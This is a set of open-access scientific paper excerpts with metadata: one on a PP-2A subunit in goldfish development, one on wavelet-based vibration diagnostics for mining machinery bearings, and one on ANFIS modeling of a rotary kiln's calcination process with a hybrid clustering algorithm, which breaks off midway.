Our demonstration that downregulation of PR55/Bδ by anti-sense RNA led to microphthalmia (small eye) in the developing embryo suggests that the specific PP-2A activity contributed by the PR55/Bδ regulatory subunit is crucial for development. In this case, the PP-2A containing the PR55/Bδ regulatory subunit may modulate a set of specific targets important for development that cannot be dephosphorylated by PP-2A with a non-PR55/Bδ regulatory subunit. Indeed, previous studies have shown that proteins such as cdc25, histone H1 and caldesmon phosphorylated by p34cdc2/cyclin B kinase are only subject to dephosphorylation by the specific PP-2A containing the PR55/B regulatory subunit. 31,[39][40][41][42] In addition, the PP-2A containing the PR55/B regulatory subunit also regulates targets phosphorylated by MAP kinases, such as the microtubule-associated protein tau. 43,44 On the other hand, we cannot rule out the possibility that the PR55/Bδ regulatory subunit alone functions through some unknown mechanism to govern goldfish development. Whether the latter case is possible is currently under investigation.
| 2014-10-01T00:00:00.000Z | 2010-12-20T00:00:00.000 | {
"year": 2010,
"sha1": "55c736e7c690262a290f0159bce1b71e682b2853",
"oa_license": "CCBYNC",
"oa_url": "http://journals.sagepub.com/doi/pdf/10.4137/GRSB.S6065",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "55c736e7c690262a290f0159bce1b71e682b2853",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
219008579 | pes2o/s2orc | v3-fos-license | The Development of Digital Technologies in Mining Machinery Technical Maintenance
Methods of functional diagnostics of the technical condition of rolling element bearings are studied in this paper, and their strengths and shortcomings are revealed. A model of shock pulse formation in the event of faults in rolling element bearings is built. The possibility of applying wavelet transformation for detecting these faults and determining the technical condition of mining machinery assembly units is introduced.
Introduction
At present, for objectively sound reasons, industrial enterprises devote a great deal of time to the issues of improving the reliability, operating efficiency and maintenance of processing equipment. These issues are vital, particularly for hazardous production facilities such as those of the coal and metal mining industries. The reason is the change of approaches towards mining and conveyor equipment operation as the machinery and technological processes become more sophisticated and the requirements towards industrial and environmental safety toughen. In a great number of machine modules, faults originate and develop in a concealed manner during operation. This may cause accidents accompanied by significant economic and social damage and air pollution. The number of contemporary technogenic accidents and disasters of various scales [1] has made it necessary to redefine the requirements towards reliable assessment of machinery condition and determination of its residual operating life, taking into account the latest scientific achievements in technical diagnostics [2,3].
On the other hand, the majority of enterprises, under conditions of cost and budget cuts, face a dire necessity to decrease expenses. This also touches the issues of production modernization and the repair and technical maintenance of main and auxiliary equipment, as a share of operating equipment components and assemblies is in a worn-out state with a significantly exhausted residual operating life [4]. Under such conditions, it is important that the cost minimization solution does not negatively influence the reliability of machinery operation. This is possible only if one can obtain accurate data on the technical condition of the equipment, and these data are obtained using different methods of technical diagnostics [5][6][7][8][9]. Any modern industrial enterprise pays close attention to improving its profitability by means of effective management of its business assets, applying an optimal strategy for repair and technical maintenance. Russian and foreign industrial practice demonstrates that justified cost reduction on technical maintenance without loss of operational reliability is achievable.

At present, coal producers operate a significant number of extensible belt conveyers [10], and the operating indices of the whole coal industry of Kuzbass depend on their good operating condition. In the short run, an increase in the power availability and technical extensiveness of belt conveyers, together with their performance and rock mass transportation distance, is expected. One can see a large-scale application of variable-frequency electric drives [11,12].
The increasing volumes of underground coal production require the creation of reliable transportation systems, and this is the main issue which the producers of coal mining extensible belt conveyer process lines should solve. Another, no less important issue is the reduction of their technical maintenance costs [13]. To provide faultless operation of a belt conveyer over a prolonged period of time, the causes of failure of different components [14], especially of toothed gearings and bearing systems, whose service life is determined by mechanical wear of the sliding surfaces, should be defined.
Setting the task
The analysis of stand-by times caused by main and face conveyer reduction gear failures [15] shows that their share varies from 7 percent to 18 percent, while the mean time for restoring normal operation is from 24 to 48 hours. All this proves the relevance of this research.
The vibration monitoring method has proved to be a reliable one for controlling the technical condition of mechanical equipment [5,16,17]. Vibration-based diagnostics is applied: for controlling the current condition of the equipment; for dividing the manifold of admissible technical conditions of machines into two subsets, working and defective; for diagnosing, which consists in defining the character and localization of one or a group of failures that correspond to the machine's vibratory condition; for detecting possible failures at an early stage or predicting their temporal evolution; for estimating residual operating life; for defining repair time and volume; and for reducing the risk of accidents. The experience of monitoring the technical condition of mining equipment indicates that detecting potential wear-out failures is more effective (up to 77 percent) when vibration parameter analysis is applied [16], and if supported by other functional diagnostics methods such as oil spectral analysis [17] and thermal-imaging monitoring, the accuracy of detecting the cause of faults increases to 95 percent.
Overall technical condition analysis of a reduction gear box after it has been assembled and tested at a testing facility (figure 1) allows both detecting and isolating manufacturing faults and defects and preventing the delivery of defective products to a consumer. Moreover, the obtained data can serve as a basis for the development of an automated quality control system.
The analysis of vibration monitoring methods allows concluding that it is advantageous to apply the spectrum-mask method (spectral plots) as a method for controlling the output products of the coal industry. The idea of this method is that the faults formed as a result of manufacturing and assembly work generate vibration in specific frequency bands with definite magnitude relations of the controlled parameters.
The spectrum-mask method allows setting the width of each frequency band, its position and the evaluation criteria values, which are compared with the current values. By analyzing the changes of the controlled parameter in a frequency band (the number of bands can vary from 6 to 30), evaluation and forecasting of the equipment condition is fulfilled [19]. The captured data on all types of the produced reduction gear boxes were statistically processed for every type of reduction gear box in the form of a maximum permissible level of root mean square vibration velocity [Ve] and a spectral mask for each control point in three orthogonally related directions. For example, figure 2 presents the results of an RKC-400 reduction gear box test run, shown as an energy spectrum registered in the axial direction at control point four. Applying modern methods for machinery health monitoring allows an individual approach towards each manufactured machinery device when evaluating its technical condition and setting threshold values for its initial, functional and limit states.
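A minimal sketch of such a spectrum-mask check is shown below; the band edges, thresholds and stand-in spectrum are hypothetical placeholders, since in practice the mask comes from the statistically processed test-run data described above.

```python
# Sketch of the spectrum-mask check: the RMS vibration level in each
# frequency band is compared against that band's maximum permissible level.
import numpy as np

def band_check(freqs, spectrum, mask):
    """mask: list of (f_low, f_high, max_level). Returns failing bands."""
    failures = []
    for f_lo, f_hi, limit in mask:
        sel = (freqs >= f_lo) & (freqs < f_hi)
        level = np.sqrt(np.mean(spectrum[sel] ** 2))   # RMS level in the band
        if level > limit:
            failures.append((f_lo, f_hi, level, limit))
    return failures

freqs = np.linspace(0, 1000, 2048)
spectrum = np.abs(np.random.randn(2048)) * 0.5         # stand-in spectrum
mask = [(0, 100, 2.0), (100, 300, 1.5), (300, 1000, 1.0)]  # hypothetical mask
print(band_check(freqs, spectrum, mask))
```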
Basic mechanical faults in mining equipment (imbalance, misalignment, gear drive defects, etc.) as a rule lead to problems in the functioning of rolling element bearings in various power-driven, transforming and operating mechanisms.
At present, the most comprehensive review of possible rolling element bearing defects is presented in [21,22], which, in the authors' opinion [21], is not complete and contains only the basic faults, the reasons that cause them and their localization.
The existing methods for analyzing the technical condition of rolling element bearings [2,19,23] only in rare cases allow adequate detection of faults, as the application of direct spectral analysis of the vibroacoustic signal for detecting rolling element bearing faults is hampered by the low amplitudes of their frequency components, which are lost against the background "carpet" noise.
Shock pulse modelling
To create a more sensitive method for detecting faults and defects, a detailed study of the dynamic processes that take place in rolling element bearings, and their modelling, is necessary.
The initiation of a shock pulse can be described by the following model:

\( x = a_0 e^{-\beta t} \sin(\omega t), \)   (1)

where x is the displacement; a0 is the initial amplitude; ω is the damped-vibration frequency, connected with the free-running frequency ω0 by \( \omega^2 = \omega_0^2 - \beta^2 \); \( \beta = r/(2m) \) is the vibration damping rate; r is the resistance value; and m is the vibrating-system mass.
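A short sketch generating a synthetic shock pulse from this model follows; all parameter values are illustrative only.

```python
# Synthetic shock pulse per Eq. (1): an exponentially damped sinusoid.
import numpy as np

a0 = 1.0             # initial amplitude
r, m = 4.0, 1.0      # resistance and vibrating-system mass (illustrative)
beta = r / (2 * m)   # damping rate
omega0 = 2 * np.pi * 50.0               # free-running (natural) frequency
omega = np.sqrt(omega0**2 - beta**2)    # damped-vibration frequency

t = np.linspace(0.0, 0.5, 5000)
x = a0 * np.exp(-beta * t) * np.sin(omega * t)
```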
By the natural frequency of a system is understood the frequency with which the system would vibrate in the absence of resisting forces [24]. An integral homogeneous system is studied in this model. In practice this process is more complicated, as any machine consists of several parts (stator, rotor, frame, body, etc.) which are movable with respect to each other. The energy from the shock is distributed between the assembly units, making them vibrate at their different, characteristic natural frequencies. Figure 3a demonstrates the vibratory acceleration pulse shape registered on a non-operating testing facility subjected to weak periodic shocks of a metal hammer. Even in the original signal (pulse) itself the presence of low and high frequency components is detected. During Fourier transformation of the vibroacoustic signal (figure 3b), false frequency components which are not typical for the original signal most often appear. An analogy with electromagnetic waves can be traced: depending on their length (frequency), components are absorbed (dissipated) to a larger or lesser degree. On the other hand, this is connected with the mass of the assembly unit that creates the given frequency and with the presence of any energy absorber (for example, a shock absorber). The difference in shock pulse amplitude at the initial moment of time is conditioned by the geometry of the mechanism, i.e. by the distance between the source of the impulse and a specific assembly unit, and by the presence of impediments to the propagation of the vibroacoustic signal. Supposing that the studied system is linear, we represent the real pulse as a sum of pattern pulses with different frequencies and damping rates:

\( x(t) = \sum_i a_i e^{-\beta_i t} \sin(\omega_i t). \)   (2)

To decompose the original signal into the form of Eq. (1) it is optimal to expand it on an appropriate basis. In the seventies of the twentieth century wavelet methods appeared. Two constraints are imposed on a wavelet function Ψ: it should be sufficiently localized, i.e. go to zero when moving away from the origin of coordinates, and the integral of the function over (−∞, +∞) should be equal to zero. The wavelet transformation looks as:

\( W(a,b) = \frac{1}{\sqrt{a}} \int_{-\infty}^{+\infty} x(t)\, \Psi^{*}\!\left(\frac{t-b}{a}\right) dt, \)   (3)

where a is a scale and b is a shift. A wavelet transform represents a signal as a set of self-similar, short wavelets, which can be shifted or stretched along the time axis. This is a fundamental difference from the infinite waves of Fourier transforms [25,26].
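The following sketch combines several such pattern pulses per Eq. (2) and computes their continuous wavelet transform with the Morlet wavelet from PyWavelets; the component frequencies and damping rates are illustrative, and the choice of wavelet is an assumption (the paper itself later uses a modified Haar wavelet).

```python
# Sum of pattern pulses (Eq. (2)) and its continuous wavelet transform.
import numpy as np
import pywt

t = np.linspace(0.0, 0.5, 5000)
components = [(1.0, 8.0, 2*np.pi*50), (0.6, 20.0, 2*np.pi*220),
              (0.3, 40.0, 2*np.pi*800)]   # (a_i, beta_i, omega_i), illustrative
x = sum(a * np.exp(-b * t) * np.sin(w * t) for a, b, w in components)

scales = np.arange(1, 128)
coef, freqs = pywt.cwt(x, scales, 'morl', sampling_period=t[1] - t[0])
# |coef| shows when each frequency component appears and how it decays.
```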
Apart from the continuous wavelet transform there is a discrete transformation, in which a filtration process takes place. Due to this, the notions of approximations (high-scale, low-frequency components) and details (low-scale, high-frequency components) occur. As a result, the original signal is divided into two signals which complement each other, together carrying the full information about the original one. In comparison with the signal decomposition into a Fourier series, wavelets can represent local peculiarities of signals with better accuracy and solve the problem of detecting faults and defects in equipment in a comprehensive way.
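A minimal sketch of such a discrete decomposition using PyWavelets and the Haar wavelet follows; the sample signal is illustrative.

```python
# Discrete wavelet decomposition: wavedec splits the signal into one
# approximation (low-frequency) and several detail (high-frequency)
# sub-signals that together reconstruct the original.
import numpy as np
import pywt

t = np.linspace(0.0, 0.5, 4096)
x = np.exp(-8.0 * t) * np.sin(2 * np.pi * 50 * t)   # sample damped pulse

coeffs = pywt.wavedec(x, 'haar', level=4)
approx, details = coeffs[0], coeffs[1:]             # low- vs high-frequency parts
x_rec = pywt.waverec(coeffs, 'haar')                # reconstructs the original
```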
Modal testing
The wavelet function has all the essential properties for solving the above-mentioned task. For example, the development of the pulse frequencies in time (figure 5) is built with the help of a modified Haar wavelet decomposition. As mentioned above, the advantage of this method is its localization, i.e. it gives the chance to trace the dynamics of the development of the frequency components' amplitudes.
Conclusion
The introduced approach to rating mechanical vibration parameters can be used in practice when developing industrial standards for norming output product vibration for the purpose of including it in the datasheet. The development of a large number of spectral masks for a wide range of mining machinery is one of the conditions for quality product manufacturing by mining machinery factories, and it assists in shifting towards new forms of technical maintenance of mining machinery.
Applying a forecasting model based on the statistical data of vibration-based diagnostics gives a chance to adequately evaluate the investigated fault and to forecast the residual life of an assembly unit or machine, making maintenance planning more effective and preventing the occurrence of emergency failures.
In general, the introduced solution will allow minimizing the expenses connected with sudden failures of rolling element bearings and optimizing supply logistics and storage facilities. All the conditions will be created for shifting to a brand new system of mining machinery repair and technical maintenance. | 2020-04-30T09:07:18.388Z | 2020-04-28T00:00:00.000 | {
"year": 2020,
"sha1": "b7ef67159b9b877a3e787f87ad02f31c70b8f095",
"oa_license": null,
"oa_url": "https://doi.org/10.1088/1757-899x/795/1/012018",
"oa_status": "GOLD",
"pdf_src": "IOP",
"pdf_hash": "b74f5e1c8b125c11aaffcc073df57c31be6603b5",
"s2fieldsofstudy": [
"Materials Science"
],
"extfieldsofstudy": [
"Physics",
"Engineering"
]
} |
55851649 | pes2o/s2orc | v3-fos-license | Modeling for the Calcination Process of Industry Rotary Kiln Using ANFIS Coupled with a Novel Hybrid Clustering Algorithm
The rotary kiln is important equipment in heavy industries, and its calcination process is the key factor in product quality. Due to the difficulty of obtaining an accurate algebraic model of the calcination process, an intelligent modeling method based on ANFIS and clustering algorithms is studied. In the model, ANFIS is employed as the core structure and, aiming to improve both its computational efficiency and accuracy, a novel hybrid clustering algorithm is proposed by combining the FCM and Subtractive methods. A quasi-random data set is then used to test the new hybrid clustering algorithm, and the results indicate its superiority over the FCM and Subtractive methods. Further, a set of data from the successful control activity of sophisticated workers in the manufacturing field is used to train the model, and the model demonstrates its advantages in both fast convergence and more accurate approximation.
Introduction
The calcination process is omnipresent in heavy industries worldwide, such as the chemical industry, steel manufacturing, and the metallurgical industry. This process is significantly important for the final product quality because calcination is where the product changes its form physically or chemically under a certain temperature for a certain span of time. Since the process features nonlinearity, long time delay, multiple variables and their serious coupling, a lot of control theories and modeling methodologies for rotary kilns have been studied in the past few decades [1][2][3].
Some researchers built algebraic models of the rotary kiln by analyzing the gas flow, granular material flow, and heat transfer. The approaches they used were mainly based upon aerodynamics and mechanical structure [4][5][6][7]. However, for a specific production kiln, it is usually difficult to obtain the necessary parameters for an adequately accurate model, which is a bottleneck for generalizing these models to wider applications.
In the past decade, much research has been carried out on rotary kiln control based on intelligent and prediction techniques. For instance, an expert system was proposed to control the kiln, which improved the production outcome [7,8]. Soft modeling methods based on neural networks, support vector machines, and the subspace method were used to predict the output index, the calcination temperature, and the tail temperature of the kiln, respectively [9][10][11]. However, there are still many problems among those studies, such as bulky computation and excessive restrictions, and research on modeling the calcination process of the kiln, which is the core factor for product quality, is rarely reported.
ANFIS (Adaptive Network-based Fuzzy Inference System), as a model identification method, has drawn much attention in different application fields recently [12][13][14]. Compared with conventional techniques, it has the advantages of mapping all the inputs to the corresponding outputs based only on the available data, incorporating linguistic knowledge for problem solving, and strong generalization capability. In order to improve the computational efficiency and identification ability of ANFIS, a clustering algorithm is utilized to partition the data into clusters and generate an appropriate number of fuzzy rules. Among many clustering methods, the fuzzy C-means clustering method (FCM) [15] and the subtractive clustering method (Subclust) [16] are widely adopted. But each of them has its drawback. Subclust only yields approximations of the actual cluster centers, whereas for FCM the number of clusters has to be decided empirically and the algorithm is sensitive to the randomly initiated membership grades. This means there is no guarantee of finding the actual centers of the clusters by applying either of the two clustering methods. Overcoming these problems is significant because a tiny deviation of the clustering centers leads to an apparent difference in the identified model when the training data have high dimensionality and are not explicitly distinguished.
In this paper, ANFIS is employed as the core structure of the calcination control model, with the input and output variables selected by analyzing the calcination reaction and the experience of sophisticated workers. As a premise procedure for modeling, a hybrid clustering algorithm combining FCM and Subclust is put forward which overcomes the weaknesses of FCM and Subclust and leads to more accurate cluster centers.
The rest of this paper starts with an introduction to the industrial rotary kiln and its calcination process in Section 2. In Section 3, the FCM and Subclust methods are introduced and then a novel hybrid way of combining these two clustering algorithms is proposed and illustrated in detail. Section 4 presents ANFIS concisely, which is adopted as the core modeling structure for the calcination process of the kiln in the next section. In Section 5, modeling is conducted with the method of ANFIS coupled with the new hybrid clustering algorithm, and the implementation results are discussed.
The Rotary Kiln and Calcination Process
The rotary kiln studied in this paper is composed of two cylinders, a calciner and a drying part, which are connected by an inspection tower. It is gigantic equipment with a length of 37 meters and a diameter of 2.5 meters, as seen in Figure 1. The kiln is installed with a slope of around 5° and rotates around its axis. The drying part has a similar length to the calciner, acting as a preheater for the inner material [17].
The material going through the kiln is lithopone, an inorganic compound used as a white pigment. It is first fed into the elevated cold end, at the right side of the drying part, and as the kiln rotates it moves along the declining inner bed due to gravity, towards the exit at the left side of the calciner. During its long inner rolling, the material is first preheated in the drying part, where the temperature is 150 °C to 200 °C, and then goes into the calciner, which includes an inner pot, as shown in Figure 2. The temperature around the pot is relatively higher, ranging between 600 °C and 800 °C, under which the lithopone changes its decoloration capability (DC).
At the hot end (head) of the kiln, the left side of the calciner, diesel or petrol is sprayed and burned to generate the heat for the whole calcining and drying process. A thermal sensor is arranged there and the head temperature is normally maintained at about 1200 °C to assure the heat is sufficient and stable. As a blower and an exhauster work at the hot end and cold end, respectively, the air flows from the hot end to the cold end, countercurrent to the material flow, conveying the heat through the kiln and at the same time taking away the water steam from the material.
Since there is no effective way to detect the output index (DC) directly, which has to be measured offline and normally becomes available about 2 hours after the lithopone leaves the exit, the control largely depends on the experienced worker who empirically adjusts the calciner rotary speed according to the calcination temperature. In general, the worker increases the rotary speed if the temperature is high, and vice versa, to ensure the material inside is heated properly.
Data Clustering Algorithm
Data clustering is the prerequisite for training the ANFIS model, and it decides the number of fuzzy rules in the model. Different clustering techniques have been proposed in the literature [15][16][17][18], among which FCM and Subclust are highly regarded and widely adopted.
In FCM, however, the group number has to be given as a premise and the iterative process is time consuming. The randomly initialized belongingness matrix leads to uncertainty of the result as well. Also, since Subclust takes data points as candidates, it does not always perform well in finding the optimal centers when the actual centers are not among the data points. These drawbacks inspire the search for a new clustering technique, aiming at improving the accuracy of the result while also reducing the bulk of calculation.
FCM Algorithm.
Consider a set of data points {x1, x2, ..., xn} in an s-dimensional space; that is, each xj (j = 1, ..., n) is a vector of s coordinates. Given the cluster number c, FCM starts by initializing a membership grade c × n matrix U at random according to (1), indicating the belongingness of each data point to the initial centers:

\( u_{ij} \in [0,1], \qquad \sum_{i=1}^{c} u_{ij} = 1, \quad j = 1, \ldots, n, \)   (1)
where u_{ij} (1 ≤ i ≤ c, 1 ≤ j ≤ n) is the degree of membership of the jth data point to the ith cluster center.
Then new centers are obtained and U is updated by the following equations, respectively:

\( c_i^{*} = \frac{\sum_{j=1}^{n} u_{ij}^{m} x_j}{\sum_{j=1}^{n} u_{ij}^{m}}, \)   (2)

\( u_{ij} = \frac{1}{\sum_{k=1}^{c} \left( \dfrac{\| x_j - c_i^{*} \|}{\| x_j - c_k^{*} \|} \right)^{2/(m-1)}}, \)   (3)

where c_i^{*} is the ith cluster center, m ∈ [1, ∞) is a weighting exponent,
and ‖·‖ is the Euclidean distance. This procedure is carried out repeatedly until the cost function J is below a certain tolerance value or no more improvement between consecutive iterations is noticed. J is defined by

\( J = \sum_{i=1}^{c} J_i = \sum_{i=1}^{c} \sum_{j=1}^{n} u_{ij}^{m} \| x_j - c_i^{*} \|^{2}, \)   (4)

where J_i is the cost function for each cluster center, i = 1, ..., c.
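A compact sketch of the FCM iteration defined by Eqs. (1)-(4) follows; the vectorized NumPy formulation and the tolerance defaults are implementation choices, not taken from the paper.

```python
# Fuzzy C-means following Eqs. (1)-(4). X: (n, s) data, c: cluster count.
import numpy as np

def fcm(X, c, m=2.0, tol=1e-5, max_iter=300, seed=None):
    rng = np.random.default_rng(seed)
    n = X.shape[0]
    U = rng.random((c, n))
    U /= U.sum(axis=0)                                    # Eq. (1)
    J_old = np.inf
    for _ in range(max_iter):
        Um = U ** m
        centers = Um @ X / Um.sum(axis=1, keepdims=True)  # Eq. (2)
        d = np.linalg.norm(X[None] - centers[:, None], axis=2)
        d = np.fmax(d, 1e-12)                             # guard divide-by-zero
        U = d ** (-2.0 / (m - 1))
        U /= U.sum(axis=0)                                # Eq. (3)
        J = float((U ** m * d ** 2).sum())                # Eq. (4)
        if abs(J_old - J) < tol:
            break
        J_old = J
    return centers, U, J
```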
Subclust Algorithm.
For the same collection of data points, Subclust begins with calculating a density value for each point by the following formula:

\( D_i^{1} = \sum_{j=1}^{n} \exp\!\left( -\frac{\| x_i - x_j \|^{2}}{(r_a/2)^{2}} \right), \)   (5)

where D_i^1 is the density value of the ith data point at the 1st round of calculation, and r_a is a positive constant representing a neighborhood radius. After all the data points are computed, the point with the highest density value is chosen as the first cluster center c_1^* and its density value is referred to as D_1^*. Afterwards the calculation goes into the 2nd round and each point's density value is revised by

\( D_i^{2} = D_i^{1} - D_1^{*} \exp\!\left( -\frac{\| x_i - c_1^{*} \|^{2}}{(r_b/2)^{2}} \right), \)   (6)

where D_i^2 is the density value of the ith data point at the 2nd round of calculation and r_b is also a positive constant, defining a neighborhood which has a measurable reduction in density value. Then the second point with the highest value is obtained, and if it satisfies certain criteria it is selected as the 2nd cluster center. This process repeats until the highest density value is less than a certain threshold. In general, at the kth round of calculation, the equation for computing the density value is

\( D_i^{k} = D_i^{k-1} - D_{k-1}^{*} \exp\!\left( -\frac{\| x_i - c_{k-1}^{*} \|^{2}}{(r_b/2)^{2}} \right), \quad \forall i = 1, \ldots, n. \)   (7)
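The following sketch implements Eqs. (5)-(7); the radii and the simple stopping rule (highest remaining density falling below a fraction of the first peak) are assumptions standing in for the full acceptance criteria of Step 3 below, and the data are assumed pre-scaled.

```python
# Subtractive clustering sketch per Eqs. (5)-(7).
import numpy as np

def subclust(X, ra=0.5, rb=0.75, stop_ratio=0.15):
    d2 = ((X[:, None, :] - X[None, :, :]) ** 2).sum(axis=2)
    D = np.exp(-d2 / (ra / 2) ** 2).sum(axis=1)           # Eq. (5)
    centers, D1 = [], None
    while True:
        k = int(np.argmax(D))
        if D1 is None:
            D1 = D[k]                                     # first (highest) peak
        elif D[k] < stop_ratio * D1:
            break                                         # simple stopping rule
        centers.append(X[k])
        dist2 = ((X - X[k]) ** 2).sum(axis=1)
        D = D - D[k] * np.exp(-dist2 / (rb / 2) ** 2)     # Eqs. (6)-(7)
    return np.array(centers)
```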
A New Hybrid Clustering Algorithm Combining FCM and Subclust.
A feasible hybrid approach is to use Subclust to obtain the implicit number of clusters and then employ FCM to find their exact centers [19]. But the improvement is rather limited and needs further development. This paper proposes a new way of combining the two which greatly enhances both computational efficiency and accuracy, as illustrated in this section.
Considering the above set of data points, Subclust is first adopted to obtain the group centers $\{x_1^*, \ldots, x_c^*\}$, and then a Gaussian function is used to define a $c \times n$ distance grade matrix $G$ as follows:
$$g_{ij} = \exp\!\left( -\frac{\|x_j - x_i^*\|^2}{2\sigma^2} \right), \qquad (8)$$
where $g_{ij}$ represents the relationship between the $j$th data point and the $i$th cluster center, and $\sigma$ is the standard deviation. According to (8), a data point close to a cluster center has a bigger distance grade value. $\sigma$ is a key parameter that largely affects the distance grade value; a recommended choice is to let $\sigma$ be $(0.1\sim1)$ times the neighborhood radius. Further, each column of $G$ is normalized to form the initial membership grade matrix $U^0$:
$$u^0_{ij} = \frac{g_{ij}}{\sum_{k=1}^{c} g_{kj}}, \qquad i = 1, \ldots, c;\; j = 1, \ldots, n, \qquad (9)$$
where $u^0_{ij}$ is the initial belongingness of the $j$th data point to the $i$th cluster center.
The next part of the hybrid clustering algorithm is initializing FCM with $U^0$. Since $U^0$ reflects the actual distances between each point and the cluster centers (that is, the initial centers are already close to the actual centers), the bulk of the computation time in FCM decreases substantially. The holistic procedure of the new clustering algorithm consists of the following steps.
Step 1. Compute the density value of every data point with (5).

Step 2. Find the first cluster center $x_1^*$ and its density value $D_1^*$, with (5) being used in the computational process.
Step 3. Revise each point's density value with (6) and find the other cluster centers using the following criteria, supposing the $(k-1)$th ($k \ge 2$) cluster center has been obtained: accept the candidate point $x_k^*$ if its density value $D_k^*$ is high enough relative to $D_1^*$; reject it outright if $D_k^*$ is too small; otherwise accept it only if its density value and its shortest distance $d_{\min}$ to all the previous centers jointly satisfy $d_{\min}/r_a + D_k^*/D_1^* \ge 1$. If the candidate is rejected, choose the point with the next highest density value and retest it according to the above three criteria.

Step 4. Based on the cluster centers $\{x_1^*, \ldots, x_c^*\}$ found in the previous steps, calculate the distance grade matrix $G$ with (8) and then the initial membership grade matrix $U^0$ with (9).
Step 5. Update the cluster centers with (2), starting from $U^0$.

Step 6. Update the membership grade matrix with (3).

Step 7. Calculate the cost function $J$ according to (4). End the clustering process if $J$ is below a certain tolerance value or the improvement over the previous iteration is less than a certain threshold; otherwise return to Step 5.
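The warm-start that distinguishes the hybrid method amounts to a few lines on top of the two routines sketched earlier. The snippet below shows Step 4 and the hand-off to FCM; the value of sigma is an assumption within the recommended range.

```python
import numpy as np

def hybrid_init_membership(X, centers, sigma):
    """Step 4: Gaussian distance grades (eq. (8)) normalized column-wise
    into the initial membership matrix U0 (eq. (9))."""
    d2 = ((centers[:, None, :] - X[None, :, :]) ** 2).sum(axis=2)  # (c, n)
    G = np.exp(-d2 / (2.0 * sigma ** 2))
    return G / G.sum(axis=0)     # each data point's grades sum to 1

# Pipeline: Subclust supplies the centers (Steps 1-3), U0 replaces FCM's
# random initialization, and Steps 5-7 are the FCM iterations of Section 3.1:
#   centers0 = subclust(X, ra=0.5)
#   U0 = hybrid_init_membership(X, centers0, sigma=0.5 * 0.5)  # sigma ~ (0.1-1) x r_a, assumed
```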
Adaptive Network-Based Fuzzy Inference System (ANFIS)
ANFIS was introduced by Jang [20] and is based on a multilayer feedforward network structure. It has 5 layers with two kinds of nodes: square nodes, which carry parameters to be identified, and circle nodes, which carry none. The directional links between nodes indicate the flow direction of signals.
Consider a system with inputs $\{x_1, x_2, \ldots, x_p\}$ and one output, and suppose each input has two fuzzy sets, as seen in Figure 3. The nodes of the same layer share the same node function, as described below.
The 1st layer is composed of square nodes with node function $\mu_{A_i^k}(x_i)$ ($i = 1, \ldots, p$; $k = 1, 2$), where $x_i$ is the input to the node and $A_i^k$ is a linguistic label representing a fuzzy set. $\mu_{A_i^k}(x_i)$ is usually chosen among bell-shaped functions, and its parameters are referred to as premise parameters.
Every node in the 2nd layer is a circle node with the label $\prod$, which multiplies all the incoming signals from the previous layer and sends the product out:
$$w_r = \prod_{x_i \in S_r} \mu_{A_i}(x_i),$$
where $S_r$ is the input set of the $r$th node from the 1st layer and $w_r$ represents the firing strength of the $r$th rule.
The 3rd layer has the same number of circle nodes as the 2nd layer. Each node, labeled $N$, calculates the ratio of its input firing strength to the sum of the firing strengths from the previous layer:
$$\bar{w}_r = \frac{w_r}{\sum_{s} w_s}.$$
Each node of the 4th layer is a square node generating each rule's output:
$$\bar{w}_r f_r = \bar{w}_r \Big( \sum_{i=1}^{p} a_{ri}\, x_i + b_r \Big),$$
where the $a_{ri}$ and $b_r$ ($r = 1, \ldots, R$; $i = 1, \ldots, p$) are the parameters of this layer, referred to as consequent parameters.
In the 5th layer there is only one circle node, with the label $\sum$, simply adding all the incoming signals together and producing the overall output $y$:
$$y = \sum_{r=1}^{R} \bar{w}_r f_r.$$
The parameters of the network are identified by another hybrid learning procedure, consisting of a forward and a backward pass, in which the least squares estimate (LSE) formulas and the gradient descent method are employed, respectively. More details can be found in [20], and applications of ANFIS can be found in [21,22].
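To make the layer-by-layer description concrete, the following is a minimal forward pass of a first-order Sugeno ANFIS with Gaussian membership functions and a full rule grid (two fuzzy sets per input, hence 2^p rules). The Gaussian choice and the parameter layout are our assumptions, since the paper only requires bell-shaped functions.

```python
import numpy as np

def anfis_forward(x, mf_centers, mf_sigmas, conseq):
    """Forward pass through the five ANFIS layers.

    x          : (p,) input vector
    mf_centers : (p, 2) Gaussian MF centers (two fuzzy sets per input)
    mf_sigmas  : (p, 2) Gaussian MF widths (premise parameters)
    conseq     : (2**p, p + 1) linear consequent parameters
    """
    p = x.size
    mu = np.exp(-0.5 * ((x[:, None] - mf_centers) / mf_sigmas) ** 2)  # layer 1
    grids = np.meshgrid(*[mu[i] for i in range(p)], indexing="ij")
    w = np.prod(np.stack([g.ravel() for g in grids]), axis=0)   # layer 2: firing strengths
    wn = w / w.sum()                                            # layer 3: normalization
    f = conseq @ np.append(x, 1.0)                              # layer 4: rule outputs
    return float(wn @ f)                                        # layer 5: weighted sum
```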
Implementation and Results
Having introduced the hybrid clustering algorithm, ANFIS, and their mathematical foundations, this section returns to the modeling of the calcination process of the industrial kiln. First, a benchmark data set is used to test the three clustering techniques presented in Section 3; the implementation of the modeling is studied afterwards.
Comparison among Different Clustering Algorithms.
A quasi-random two-dimensional data set is used as a benchmark problem to test the performance of the three clustering algorithms. The data set is taken from the Matlab Toolbox and includes 140 two-dimensional chaotic data points. Assuming there are 3 cluster centers to be found, the three algorithms are implemented individually and their performances are tested. Table 1 lists the values of the related parameters used in the implementation of the three algorithms. Figure 4 shows the cluster centers obtained by the three methods; it can be seen that the results of FCM and the hybrid algorithm are closer to the actual centers. Indeed, the root mean square error (RMSE) of Subclust turns out to be 14.7956, the highest of the three. Figure 5 shows the evolution of the cost function over time for FCM and the hybrid algorithm, and it is evident that the convergence speed of the hybrid algorithm greatly exceeds that of FCM. Table 2 compares the iteration numbers and RMSE of FCM and the hybrid algorithm, which also indicates the superior performance of the hybrid algorithm.
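For reference, RMSE figures of this kind can be computed by pairing each found center with its nearest actual center. The pairing rule is our assumption, since the paper does not spell out how the error was evaluated.

```python
import numpy as np

def center_rmse(found, actual):
    """RMSE of found cluster centers against the actual ones (nearest-match pairing)."""
    found, actual = np.asarray(found), np.asarray(actual)
    d = np.linalg.norm(found[:, None, :] - actual[None, :, :], axis=2)
    return float(np.sqrt((d.min(axis=1) ** 2).mean()))
```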
Calcination Process Modeling.
The first question to be solved is the determination of the input and output variables for the control model. The method adopted in this paper relies on the experience of seasoned workers and an analysis of the calcination mechanism inside the kiln. In practice, the worker regulates the calcination rotary speed (Hz) according to the calcination temperature T (°C), as seen in Figure 1, which provides the important information that the rotary speed can be the only output and the temperature should be one of the input variables.
